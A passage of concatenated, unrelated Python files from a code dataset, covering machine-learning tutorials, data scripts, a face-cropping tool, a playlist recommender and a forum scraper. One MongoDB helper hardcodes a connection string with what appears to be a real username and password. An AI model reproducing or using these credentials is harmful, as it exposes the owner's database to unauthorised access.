self.num = 2\n    def extract(self, data):\n        data.shape\n        # y, x_FL and x_Rl\n        y = data[:,0]\n        x_FL = data[:,1]\n        x_RL = data[:,3]\n        #f_1 = np.exp(y-5.4)/(x_FL * x_RL + 1)\n        #f_1 = 1/(1 + np.exp(-(y-5.4) + np.log(x_FL*x_RL)))\n        f_1 = 1/(1 + np.exp(2*(5.4-y) + np.log(x_FL*x_RL+0.5)))\n        for i in range(len(y)):\n            if y[i]<3.6:\n                f_1[i] = 1/(1 + np.exp(2*(1.8-y[i]) + np.log(x_FL[i]*x_RL[i]+0.5)))\n\n        # y, x_FR and x_RR\n        x_FR = data[:,2]\n        x_RR = data[:,4]\n        #f_2 = np.exp(5.4-y)/(x_FR * x_RR + 1)\n        #f_2 = 1/(1 + np.exp(-(5.4-y) + np.log(x_FR*x_RR)))\n        f_2 = 1/(1 + np.exp(2*(y-5.4) + np.log(x_FR*x_RR+0.5)))\n        for i in range(len(y)):\n            if y[i]>7.2:\n                f_2[i] = 1/(1 + np.exp(2*(y[i]-9) + np.log(x_FR[i]*x_RR[i]+0.5)))\n        \n\n        features = np.transpose(np.concatenate(([f_1],[f_2]),0))\n        return features\n\n","sub_path":"Algorithms/ewIDCAD_clustering_dynamics/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"601866947","text":"#tensor flow libraries\nimport tensorflow as tf\nfrom tensorflow import keras\n#numpy libraries\nimport numpy as np\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport cv2\nimport IPython\n\nclass PrintDot(keras.callbacks.Callback):\n    def on_epoch_end(self, epoch, logs):\n        if epoch % 100 == 0: \n            print('')\n        print ('.', end='')\n\ndef build_model(train_features):\n    model = keras.Sequential([\n        keras.layers.Dense(20, activation=tf.nn.relu, input_shape=[len(train_features[0])]),\n        keras.layers.Dense(100),\n        keras.layers.Dense(1)\n    ])\n\n    model.compile(optimizer=tf.train.AdamOptimizer(), loss='mse', metrics=['mae', 'mse'])\n\n    return model\n\ndef plot_history(history):\n    plt.figure()\n    plt.xlabel(\"Epoch\")\n    plt.ylabel(\"Mean Square Error [Thousand Dollars$^2$]\")\n    plt.plot(history['epoch'], history['mean_squared_error'], label='Train Error')\n    plt.plot(history['epoch'], history['val_mean_squared_error'], label='Val Error')\n    plt.legend()\n    plt.ylim([0, 50])\n\n    plt.show()\n\n\n\n(train_features, train_labels), (test_features, test_labels) = keras.datasets.boston_housing.load_data()\n# compute the mean\ntrain_mean = np.mean(train_features, axis=0)\n# compute the standard deviation\ntrain_std = np.std(train_features, axis=0)\n# normalize the data\ntrain_features_norm = (train_features-train_mean)/train_std\n\nmodel = build_model(train_features_norm)\nearly_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=50)\nhistory = model.fit(train_features_norm, train_labels, batch_size=32, epochs=10000, verbose=True, validation_split=0.1, callbacks=[early_stop, PrintDot()])\n\nhist = pd.DataFrame(history.history)\nhist['epoch'] = history.epoch\n\nrmse_final = np.sqrt(float(hist['val_mean_squared_error'].tail(1)))\nprint()\nprint('Final Root Mean Square Error on validation set: {}'.format(round(rmse_final, 3)))\n\ntest_mean = np.mean(test_features, axis=0)\ntest_std = np.std(test_features, axis=0)\n\ntest_features_norm = (test_features - train_mean) / train_std\nmse, _, _ = model.evaluate(test_features_norm, test_labels)\npredict = model.predict(test_features_norm)\n\nrmse = np.sqrt(mse)\nprint('Root Mean Square Error on test set: {}'.format(rmse, 3))\n\nplt.xlabel(\"lstat\")\nplt.ylabel(\"value\")\nplt.scatter(train_features[:, -1], train_labels)\n\nplot_history(hist)\n\nprint (test_labels)\nprint (predict)","sub_path":"tutorial1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"58096856","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport openpyxl\nfrom copy import copy\n\n# on Windows you must do this, or an error occurs\nimport locale\nlocale.setlocale(locale.LC_ALL, '')\n\nclass Katana(object):\n    def __init__(self, row):\n        self.name = row[0].value\n        self.yomi = row[1].value\n        self.owner = row[2].value\n        self.category = row[3].value\n        self.note = row[4].value\n        self.inventory_this_month = row[5].value\n        self.inventory_last_month = row[6].value\n\n        # super(Katana, self).__init__()\n        # self.arg = arg\n\n\ndef main():\n    # open the file\n    input_file = 'toukenDaicho.xlsx'\n    wb = openpyxl.load_workbook(input_file)\n    sheet = wb[\"Sheet1\"]\n\n    # list the swords whose inventory status for this month is not \"済\" (done), together with their owners\n    yet_katanas = []\n    yet_bushos = []\n\n    for i in range(1,sheet.max_row):\n        katana = Katana(list(sheet.rows)[i])\n\n        if not(katana.inventory_this_month == \"済\"):\n            yet_katanas.append(katana.name)\n            yet_bushos.append(katana.owner)\n\n    # display the swords that have not been inventoried yet and their owners\n    print(\"【まだ棚卸されていない刀】\")\n    for i in range(len(yet_katanas)):\n        print(yet_katanas[i] + \" -- \" + yet_bushos[i])\n\n    # write out the list\n    with open(\"out.csv\", \"w\") as f:\n        for yet_katana in yet_katanas:\n            f.write(yet_katana + \"\\n\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"toukenChecker2.py","file_name":"toukenChecker2.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"572810828","text":"#-----------------------------------------------------------------------------\n# followme, with Turtle, OOP\n#-----------------------------------------------------------------------------\n\nfrom turtle import *\nfrom tkinter import *\n\n\nclass Main():\n    def __init__(self,root):\n        self.canvas = Canvas(root,width=500,height=400,bd=5,bg=\"white\",relief=GROOVE)\n        self.canvas.bind(\"\",self.moveCircle)\n        self.canvas.pack()\n\n        self.screen = TurtleScreen(self.canvas)\n        self.screen.setworldcoordinates(0,400,500,0)\n        self.screen.tracer(False) # switches off the turtle animation\n        \n        self.circle = Circle(self.screen)\n\n    def moveCircle(self,event):\n        self.circle.move(event.x,event.y)\n        self.screen.update()\n\n    \nclass Circle(RawTurtle):\n    def __init__(self,screen):\n        RawTurtle.__init__(self,screen)\n        self.shape(\"circle\")\n        self.penup()\n    \n    def move(self,x,y):\n        self.goto(x,y)\n\n    \nif __name__ == \"__main__\":\n    root = Tk()\n    app = Main(root)\n    root.mainloop()\n","sub_path":"Quellen/python/python - weiterbildung kael/py zu Kap 6/followmeTurtleOOP.py","file_name":"followmeTurtleOOP.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"121772270","text":"import Utilities\r\n\r\nclass User(object):\r\n\r\n\tdef __init__(self,name=\"\",age=-1,gender=\"\",conditions=None):\r\n\t\tself.name = name\r\n\t\tself.age = age\r\n\t\tself.gender = gender\r\n\t\tself.conditions = conditions\r\n\r\n\tdef saveUserInfo(self):\r\n\t\tresult = self.name + \"\\n\\n\"\r\n\t\tresult += str(self.age) + \"\\n\\n\"\r\n\t\tresult += self.gender + \"\\n\\n\"\r\n\t\t# all variables split by double linebreak\r\n\t\tfor condition in self.conditions:\r\n\t\t\t# conditions all on same line, split by double comma\r\n\t\t\tresult += condition + \",,\"\r\n\t\tresult += 
\"\\n\\n\"\r\n\t\tresult += \"**END USER INFO**\"\r\n\t\tUtilities.writeFile(\"%s.txt\"%self.name,result)\r\n\r\n\t@staticmethod\r\n\tdef loadUserInfo(filepath):\r\n\t\tfullInfo = Utilities.readFile(filepath)\r\n\t\tlines = fullInfo.split(\"\\n\\n\")\r\n\t\tname = lines[0]\r\n\t\tage = int(lines[1])\r\n\t\tgender = lines[2]\r\n\t\tconditions = lines[3].split(\",,\")[:-1]\r\n\t\tnewUser = User(name,age,gender,conditions)\r\n\t\treturn newUser\r\n\r\n\tdef toString(self):\r\n\t\tresult = \"NAME: \" + self.name + \"\\n\"\r\n\t\tresult += \"AGE: \" + str(self.age) + \"\\n\"\r\n\t\tresult += \"GENDER: \" + self.gender + \"\\n\"\r\n\t\tresult += \"CONDITIONS: \"\r\n\t\tfor condition in self.conditions:\r\n\t\t\tresult += condition + \", \"\r\n\t\treturn result","sub_path":"user_class.py","file_name":"user_class.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"425109296","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport os\nimport torch.nn as nn\nfrom torchvision import transforms\nfrom data_loader import get_loader\nfrom model import SISR\nfrom PIL import Image\nfrom math import log10\n\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_image(image_path, transform=None):\n image = Image.open(image_path) \n if transform is not None:\n image = transform(image).unsqueeze(0)\n return image\n\ndef main(args):\n # Image preprocessing\n transform = transforms.Compose([transforms.ToTensor()])\n criterion = nn.MSELoss(reduction='mean')\n\n model = SISR()\n # Build models\n model = model.to(device)\n model.load_state_dict(torch.load(args.model_path))\n valid_data_loader = get_loader(args.valid_image_dir, transform, 1, shuffle=True, num_workers=3)\n\n avg_PSNR = 0\n with torch.no_grad():\n for i, (hr_image, lr_image) in enumerate(valid_data_loader):\n # Set mini-batch dataset\n hr_image = hr_image.to(device)\n lr_image = lr_image.to(device)\n \n # Forward, backward and optimize\n outputs = model(lr_image)\n loss = criterion(outputs, hr_image)\n\n # Print log info\n avg_PSNR += 10 * log10(1 / loss.item())\n\n print('Validation PSNR: %f' % (float(avg_PSNR) / 100))\n\n fig = plt.figure()\n # Prepare an image\n for i, index in enumerate([15, 69, 96]):\n lr_image = load_image('./data/mscoco2017_val_resized/LR/%04d.jpg' % index, transform)\n lr_image_tensor = lr_image.to(device)\n \n # Generate an caption from the image\n with torch.no_grad():\n outputs = model(lr_image_tensor)\n hr_image = Image.open('./data/mscoco2017_val_resized/HR/%04d.jpg' % index)\n \n # print(outputs.size())\n # print(torch.squeeze(outputs).size())\n # print(torch.squeeze(outputs).permute(1, 2, 0).size())\n # exit()\n plt.subplot(231+i)\n plt.imshow(np.asarray(hr_image))\n # plt.imshow(np.asarray(hr_image))\n plt.subplot(234+i)\n image = (torch.squeeze(outputs).permute(1, 2, 0).cpu().numpy() * 255).astype(np.uint8)\n plt.imshow(image)\n plt.show()\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_path', type=str, help='path for trained decoder')\n parser.add_argument('--valid_image_dir', type=str, default='data/mscoco2017_val_resized', help='directory for resized validation images')\n # Model parameters (should be same as paramters in train.py)\n args = parser.parse_args()\n 
main(args)","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"102844019","text":"from PIL import Image\nimport requests\nfrom io import BytesIO\nimport cv2\nimport os\nimport numpy\nimport utils\n \n## save the cropped face images\ndef saveCutImg(gray, saveDir, regions, count):\n    for region in regions:\n        x, y, w, h = region\n        image = utils.getXYWH(gray, x, y, w, h)\n        count = count + 1\n        p = os.path.join(saveDir, \"{}.png\".format(str(count).zfill(8)))\n        cv2.imwrite(p, image)\n    return count\n\ndef cutImgByFile(face_cascade, txtPath, saveDir, count):\n    imgUrls = utils.readText(txtPath)\n    print(len(imgUrls))\n    for (i, img) in enumerate(imgUrls):\n        try:\n            print(\"[INFO] processing image {}/{}\".format(i + 1, len(imgUrls)))\n            \n            response = requests.get(img, headers = utils.getHeaders())\n            img = Image.open(BytesIO(response.content))\n            gray = cv2.cvtColor(numpy.asarray(img), cv2.COLOR_BGR2GRAY)\n            faces = face_cascade.detectMultiScale(gray, 1.2, 3)\n            count = saveCutImg(gray, saveDir, faces, count)\n        except Exception as e:\n            print(e)\n    return count\n\ndef cutImgByDir(face_cascade, path, count):\n    for p in os.listdir(path) :\n        c = 0\n        p = os.path.join(path, p)\n        if os.path.isfile(p):\n            p2 = os.path.splitext(p)[0]\n            if not os.path.exists(p2):\n                os.makedirs(p2)\n            else :\n                continue\n            c = cutImgByFile(face_cascade, p, p2, c);\n    return count + c\n\npath = \"url\"\nface_cascade = utils.getFace()\ncount = 0\n\ncount = cutImgByDir(face_cascade, path, count)\nprint(count)\n ","sub_path":"demo/face/cut_img.py","file_name":"cut_img.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"388534923","text":"# Visualization library\n# from tqdm import tqdm\n\n# python standard library\nimport datetime as dt\nfrom collections import Counter, defaultdict\n\n# Data library\nimport numpy as np\nimport pandas as pd\n\n# Torch\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torchtext.vocab import Vectors\n\n# Models\nfrom Models.word2vec import Kakao_Tokenizer\nfrom Models.dataset import SongTagDataset, SongTagGenreDataset\n\n# Utils\nfrom Utils.file import load_json, write_json\nfrom Utils.preprocessing import DicGenerator, most_popular, remove_seen, most_similar, most_similar_emb\nfrom Utils.static import autoencoder_encoder_layer_path, vectorizer_weights_path, plylst_emb_path, plylst_emb_gnr_path, plylst_w2v_emb_path\nfrom Utils.static import train_file_path, song_meta_file_path, song2id_file_path, result_file_base\n\n# CUDA\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\nclass Recommender(nn.Module) :\n    def __init__(self, auto_weights=autoencoder_encoder_layer_path, w2v_weights=vectorizer_weights_path) :\n        super(Recommender, self).__init__()\n\n        self.autoencoder = self._load_autoencoder(auto_weights)\n        self.vectorizer, self.word_dict = self._load_vectorizer(w2v_weights)\n        self.tokenizer = Kakao_Tokenizer()\n        self.cos = nn.CosineSimilarity(dim=1)\n\n        self.pre_auto_emb = pd.DataFrame(np.load(plylst_emb_path, allow_pickle=True).item()).T\n        self.pre_auto_emb_gnr = pd.DataFrame(np.load(plylst_emb_gnr_path, allow_pickle=True).item()).T\n        self.pre_w2v_emb = pd.DataFrame(np.load(plylst_w2v_emb_path, allow_pickle=True).item()).T\n\n        self._load_dictionary()\n\n    def _load_autoencoder(self, model_path) :\n        autoencoder = torch.load(model_path, 
map_location=torch.device('cpu'))\n\n return autoencoder\n\n def _load_vectorizer(self, model_path) :\n vectors = Vectors(name=model_path)\n embedding = nn.Embedding.from_pretrained(vectors.vectors, freeze=False).to(device)\n\n return embedding, dict(vectors.stoi)\n\n def _load_dictionary(self) :\n train_data = load_json(train_file_path)\n song_meta = load_json(song_meta_file_path)\n \n self.song_plylst_dic, self.song_tag_dic, self.plylst_song_dic, self.plylst_tag_dic, self.tag_plylst_dic, self.tag_song_dic, _, self.song_artist_dic = DicGenerator(train_data, song_meta)\n self.freq_song = set(dict(np.load(song2id_file_path, allow_pickle=True).item()).keys())\n _, self.song_popular = most_popular(train_data, 'songs', 200)\n _, self.tag_popular = most_popular(train_data, 'tags', 20)\n \n def similarity_by_auto(self, question_data, genre:bool) :\n q_id = pd.DataFrame(question_data)['id']\n\n with torch.no_grad() :\n if genre :\n train_tensor = torch.from_numpy(self.pre_auto_emb_gnr.values).to(device)\n question_dataset = SongTagGenreDataset(question_data)\n question_loader = DataLoader(question_dataset, batch_size=256, num_workers=8)\n \n for _id, _data, _dnr, _dtl_dnr in question_loader :\n _data = _data.to(device)\n auto_emb = self.autoencoder(_data)\n auto_emb = torch.cat([auto_emb, _dnr.to(device), _dtl_dnr.to(device)], dim=1)\n else :\n train_tensor = torch.from_numpy(self.pre_auto_emb.values).to(device)\n question_dataset = SongTagDataset(question_data)\n question_loader = DataLoader(question_dataset, batch_size=256, num_workers=8)\n\n for _id, _data in question_loader :\n _data = _data.to(device)\n auto_emb = self.autoencoder(_data)\n\n scores = torch.zeros([auto_emb.shape[0], train_tensor.shape[0]], dtype=torch.float64).to(device)\n for idx, vector in enumerate(auto_emb) :\n output = self.cos(vector.reshape(1, -1), train_tensor)\n scores[idx] = output\n\n scores = torch.sort(scores, descending=True)\n sorted_scores, sorted_idx = scores.values.cpu().numpy(), scores.indices.cpu().numpy()\n\n s = pd.DataFrame(sorted_scores, index=q_id)\n if genre :\n i = pd.DataFrame(sorted_idx, index=q_id).applymap(lambda x : self.pre_auto_emb_gnr.index[x])\n else :\n i = pd.DataFrame(sorted_idx, index=q_id).applymap(lambda x : self.pre_auto_emb.index[x])\n\n return pd.DataFrame([pd.Series(list(zip(i.loc[idx], s.loc[idx]))) for idx in q_id], index=q_id) \n \n def similarity_by_w2v(self, question_data) :\n def find_word_embed(words) :\n ret = []\n for word in words :\n try :\n ret.append(self.word_dict[word])\n except KeyError :\n pass\n \n return ret\n question_df = pd.DataFrame(question_data)\n\n p_ids = question_df['id']\n p_token = question_df['plylst_title'].map(lambda x : self.tokenizer.sentences_to_tokens(x)[0])\n p_tags = question_df['tags']\n p_dates = question_df['updt_date'].str[:7].str.split('-')\n\n question_df['tokens'] = p_token + p_tags + p_dates\n question_df['emb_input'] = question_df['tokens'].map(lambda x : find_word_embed(x))\n\n outputs = []\n for e in question_df['emb_input'] :\n _data = torch.LongTensor(e).to(device)\n with torch.no_grad() :\n word_output = self.vectorizer(_data)\n if len(word_output) :\n output = torch.mean(word_output, axis=0)\n else :\n output = torch.zeros(200).to(device)\n outputs.append(output)\n outputs = torch.stack(outputs)\n\n train_tensor = torch.from_numpy(self.pre_w2v_emb.values).to(device)\n\n scores = torch.zeros([outputs.shape[0], train_tensor.shape[0]], dtype=torch.float64).to(device)\n for idx, vector in enumerate(outputs) :\n output = 
self.cos(vector.reshape(1, -1), train_tensor)\n            scores[idx] = output\n\n        scores = torch.sort(scores, descending=True)\n        sorted_scores, sorted_idx = scores.values.cpu().numpy(), scores.indices.cpu().numpy()\n\n        s = pd.DataFrame(sorted_scores, index=p_ids)\n        i = pd.DataFrame(sorted_idx, index=p_ids).applymap(lambda x : self.pre_w2v_emb.index[x]) \n\n        return pd.DataFrame([pd.Series(list(zip(i.loc[idx], s.loc[idx]))) for idx in p_ids], index=p_ids) \n\n    def _counting_question_data(self, q_songs, q_tags) :\n        song_plylst_C = Counter()\n        tag_song_C = Counter()\n\n        for q_s in q_songs:\n            song_plylst_C.update(self.song_plylst_dic[q_s])\n        # for each tag contained in the question\n        for q_t in q_tags:\n            tag_song_C.update(self.tag_song_dic[q_t])\n        # divide by the number of songs in each playlist to turn counts into ratios\n        for i, j in list(song_plylst_C.items()):\n            if len(self.plylst_song_dic[i]) > 0:\n                song_plylst_C[i] = (j / len(self.plylst_song_dic[i]))\n\n        return song_plylst_C, tag_song_C\n    \n    def _check_question_status(self, q_songs, q_tags) :\n        song_tag_status = 2\n        if len(q_songs) == 0 and len(q_tags) == 0:\n            song_tag_status = 0\n        elif len(q_songs) <= 3:\n            song_tag_status = 1\n\n        return song_tag_status\n\n    def _calc_scores(self, plylsts, scores, song_plylst_C, n_msp, n_mtp, q_songs, new_song_plylst_dict) :\n        plylst_song_scores = defaultdict(float)\n        plylst_tag_scores = defaultdict(float)\n        \n        # 3-1. compute plylst_song_scores\n        for idx, ms_p in enumerate(plylsts[0]):\n            for song in self.plylst_song_dic[ms_p]:\n                song_score = 0\n                for q_s in q_songs:\n                    try:\n                        song_score += len(new_song_plylst_dict[q_s] & new_song_plylst_dict[song]) / len(new_song_plylst_dict[q_s])\n                    except:\n                        pass\n                if song in self.freq_song:\n                    plylst_song_scores[song] += song_plylst_C[ms_p] * song_score * scores[0][idx] * (n_msp - idx) * 4\n                else:\n                    plylst_song_scores[song] += song_plylst_C[ms_p] * song_score * scores[0][idx] * (n_msp - idx)\n\n            for tag in self.plylst_tag_dic[ms_p]:\n                plylst_tag_scores[tag] += scores[1][idx] * (n_msp - idx)\n\n        # 3-2. compute plylst_tag_scores\n        for idx, mt_p in enumerate(plylsts[1]):\n            for tag in self.plylst_tag_dic[mt_p]:\n                plylst_tag_scores[tag] += scores[1][idx] * (n_mtp - idx)\n\n            for song in self.plylst_song_dic[mt_p]:\n                plylst_song_scores[song] += scores[1][idx]\n\n        # 3-3. adjust plylst_{song/tag}_scores\n        for idx, mt_p in enumerate(plylsts[2]):\n            for song in self.plylst_song_dic[ms_p] :\n                plylst_song_scores[song] += scores[2][idx] * (n_msp - idx)\n\n            for tag in self.plylst_tag_dic[mt_p] :\n                plylst_tag_scores[tag] += scores[2][idx] * (n_mtp - idx)\n\n        plylst_song_scores = sorted(plylst_song_scores.items(), key = lambda x : x[1], reverse=True)\n        plylst_tag_scores = sorted(plylst_tag_scores.items(), key = lambda x : x[1], reverse=True)\n        \n        return plylst_song_scores, plylst_tag_scores\n    \n    def _fill_no_data(self, plylst_song_scores, plylst_tag_scores) :\n        # fill in q_songs from scratch (the question has no songs, so predict songs from playlists that are similar by title_scores)\n        pre_songs = [scores[0] for scores in plylst_song_scores][:200]\n        pre_songs = pre_songs + remove_seen(pre_songs, self.song_popular)\n        q_songs = pre_songs[:100]\n\n        # fill in q_tags from scratch (the question has no tags, so predict tags from playlists that are similar by title_scores)\n        pre_tags = [scores[0] for scores in plylst_tag_scores][:20]\n        pre_tags = pre_tags + remove_seen(pre_tags, self.tag_popular)\n        q_tags = pre_tags[:10]\n\n        return q_songs, q_tags\n\n    def _exists_artist_filter(self, q_songs, song_tag_status, plylst_song_scores) :\n        lt_song_art = []\n        if len(q_songs) > 0 : # when songs are present\n            q_artists = []\n            for w_song in q_songs:\n                q_artists.extend(self.song_artist_dic[w_song])\n            \n            artist_counter = Counter(q_artists)\n            artist_counter = sorted(artist_counter.items(), key=lambda x: x[1], reverse=True)\n            \n            if song_tag_status == 1:\n                q_artists = [art[0] for art in artist_counter]\n            else:\n                q_artists = [x[0] for x in artist_counter if x[1] > 1]\n            \n            cand_ms = [scores[0] for scores in plylst_song_scores][(100 - len(q_artists)):1000]\n            for cand in cand_ms:\n                if q_artists == []:\n                    break\n                if cand in q_songs:\n                    break\n                for art in self.song_artist_dic[cand]:\n                    if art in q_artists :\n                        lt_song_art.append(cand)\n                        q_artists.remove(art)\n                        break\n        \n        return lt_song_art\n\n    def inference(self, question_data, n_msp=50, n_mtp=90, save=True) :\n        auto_scores = self.similarity_by_auto(question_data, False)\n        auto_gnr_scores = self.similarity_by_auto(question_data, True)\n        w2v_scores = self.similarity_by_w2v(question_data)\n\n        rec_list = []\n\n        for q in question_data :\n            q_id = q['id']\n            q_songs = q['songs']\n            q_tags = q['tags']\n            \n            song_plylst_C, tag_song_C = self._counting_question_data(q_songs, q_tags)\n\n            song_tag_status = self._check_question_status(q_songs, q_tags)\n\n            # Case 1: the question has neither songs nor tags\n            if song_tag_status == 0:\n                # plylst_ms / plylst_mt: n_msp / n_mtp playlists that are similar by title_scores\n                plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, w2v_scores)\n                plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n                plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, auto_scores)\n\n            # Case 2: the question has only a few songs and tags\n            elif song_tag_status == 1 :\n                plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, auto_scores)\n                plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n                plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, auto_gnr_scores)\n\n            # Case 3: the question has enough songs and tags\n            else:\n                plylst_ms, song_scores = most_similar_emb(q['id'], n_msp, auto_scores)\n                plylst_mt, tag_scores = most_similar_emb(q['id'], n_mtp, auto_gnr_scores)\n                plylst_add, add_scores = most_similar_emb(q['id'], n_mtp, w2v_scores)\n\n            plylsts = [plylst_ms, plylst_mt, plylst_add]\n            scores = [song_scores, tag_scores, add_scores]\n\n            new_song_plylst_dict = defaultdict(set)\n            for plylst in plylsts[0]:\n                for _song in self.plylst_song_dic[plylst]:\n                    new_song_plylst_dict[_song].add(plylst)\n\n            plylst_song_scores, plylst_tag_scores = self._calc_scores(plylsts, scores, song_plylst_C, n_msp, n_mtp, q_songs, new_song_plylst_dict)\n\n            if song_tag_status == 0 :\n                q_songs, q_tags = self._fill_no_data(plylst_song_scores, plylst_tag_scores)\n\n            lt_song_art = self._exists_artist_filter(q_songs, song_tag_status, plylst_song_scores)\n\n            # song recommendation\n            if len(q_songs) > 0 : # when songs are present\n                song_similar = [scores[0] for scores in plylst_song_scores][:200]\n            else : # no songs, but tags are present\n                song_similar = most_similar(tag_song_C, 200)\n\n            ## tag recommendation\n            tag_similar = [scores[0] for scores in plylst_tag_scores][:20]\n\n            song_candidate = song_similar + remove_seen(song_similar, self.song_popular)\n            tag_candidate = tag_similar + remove_seen(tag_similar, self.tag_popular)\n\n            song_candidate = song_candidate[:100] if song_tag_status == 0 else remove_seen(q_songs, song_candidate)[:100]\n            if len(lt_song_art) > 0:\n                lt_song_art = [x for x in lt_song_art if x not in song_candidate]\n                song_candidate[(100 - len(lt_song_art)):100] = lt_song_art\n\n            tag_candidate = tag_candidate[:10] if song_tag_status == 0 else remove_seen(q_tags, tag_candidate)[:10]\n\n            rec_list.append({\"id\": q_id, \"songs\": song_candidate, \"tags\": tag_candidate})\n\n        if save is True:\n            result_file_path = result_file_base.format(dt.datetime.now().strftime(\"%y%m%d-%H%M%S\"))\n            write_json(rec_list, result_file_path)\n            print('Result file saved to {}'.format(result_file_path))\n        else :\n            return rec_list","sub_path":"Web/Models/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":15026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"500748938","text":"# write a program to check whether a number is an Armstrong number\n\ninput_number = input(\"enter your number\\n\")\nprint(input_number)\nnumber_length = len(input_number)\nprint(number_length)\nsum=0\nfor value in input_number:\n    val = int(value)**number_length\n    sum+=val\n    \nprint(sum)\nif int(input_number) == sum:\n    print('your number is an armstrong number')\nelse:\n    print('Your number is not an armstrong number')","sub_path":"armstrong_number.py","file_name":"armstrong_number.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"598634812","text":"def solve(s1,s2):\n    s3 = \"\"\n    s4 = \"\"\n    t = 0\n    for i in range(len(s1) - 1, - 1, -1):\n        if s1[i] == '#':\n            t += 1\n        else:\n            if t > 0:\n                t -= 1\n            else:\n                s3 = s1[i] + s3\n    t = 0\n    for i in range(len(s2) - 1, - 1, -1):\n        if s2[i] == '#':\n            t += 1\n        else:\n            if t > 0:\n                t -= 1\n            else:\n                s4 = s2[i] + s4\n    print(s3)\n    print(s4)\n\ns1 = input()\ns2 = input()\nsolve(s1,s2)\n\n\"\"\"\n'#' refers to backspace\n\ninput :- a1 = 'a##bc' , a2 = 'd#g#c'\noutput :- true\nexp :- a1 becomes 'c' and a2 also becomes 'c'\n\n\"\"\"","sub_path":"LeetCode/Backspace_String_Compare.py","file_name":"Backspace_String_Compare.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"421736253","text":"from datetime import date, timezone\nimport datetime\nimport pymongo\nfrom PyQt5 import QtCore, QtWidgets\nMyserver = 'mongodb+srv://Chayapol:aum0825904216@cluster0.xjaok.mongodb.net/?retryWrites=true&w=majority'\ndataProductlist = []\n\ndef clearProduct():\n    dataProductlist.clear()\n\ndef addDatatoList(data):\n    temp = {'size':data[0],\n            'price':data[1],\n            'qty':data[2]}\n    dataProductlist.append(temp)\n\ndef editDatatoList(data,pointer):\n    
temp = {'size': data[0],\n 'price': data[1],\n 'qty': data[2]}\n dataProductlist[pointer] = temp\n\ndef deleteDatainList(pointer):\n del dataProductlist[pointer]\n\ndef getDataProducts():\n return dataProductlist\n\ndef getLastProductID():\n with (pymongo.MongoClient(Myserver)) as conn:\n db = conn.get_database('Coffee_shop')\n where = {}\n sortz = [(\"_id\",-1)]\n cursor = db.Product.find(where).sort(sortz).limit(1)\n for i in cursor:\n lastID = i['id']\n return lastID + 1","sub_path":"library/lib_send_data.py","file_name":"lib_send_data.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"567139518","text":"\"\"\" Core scraper for bitcointalk.org. \"\"\"\nfrom bitcointalk import memoizer\nimport logging\nimport getopt\nimport sys\nimport time\nimport json\nfrom datetime import datetime, timedelta\n\ndef main(argv):\n if len(argv) == 0:\n print('You must pass some parameters')\n return\n\n try:\n opts, args = getopt.getopt(argv, \"\", (\n \"boardId=\",\n \"everyN=\",\n \"since=\",\n \"until=\"\n ))\n\n boardId = None\n everyN = None\n since = None\n until = None\n untilDate = (datetime.utcnow() + timedelta(days=1)).date()\n\n for opt, arg in opts:\n if opt == \"--boardId\":\n boardId = int(arg)\n\n elif opt == '--everyN' and arg != '':\n everyN = int(arg)\n\n elif opt == '--since' and arg != '':\n since = arg\n sinceDate = datetime.strptime(since, '%Y-%m-%d').date()\n\n elif opt == '--until' and arg != '':\n until = arg\n untilDate = datetime.strptime(until, '%Y-%m-%d').date()\n\n board = memoizer.scrapeBoard(boardId, since, until)\n sleepTime = 3\n results = []\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s:%(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n\n logging.info(\"Beginning scrape of board ID...\".format(boardId))\n boardPageNum = 1\n while boardPageNum <= board['num_pages']:\n try:\n data = memoizer.scrapeTopicIds(boardId, boardPageNum, since, until)\n topicIds = data['topic_ids']\n if len(topicIds) == 0 and \\\n since != None and \\\n data['last_edit_first_topic'] != None:\n if sinceDate >= 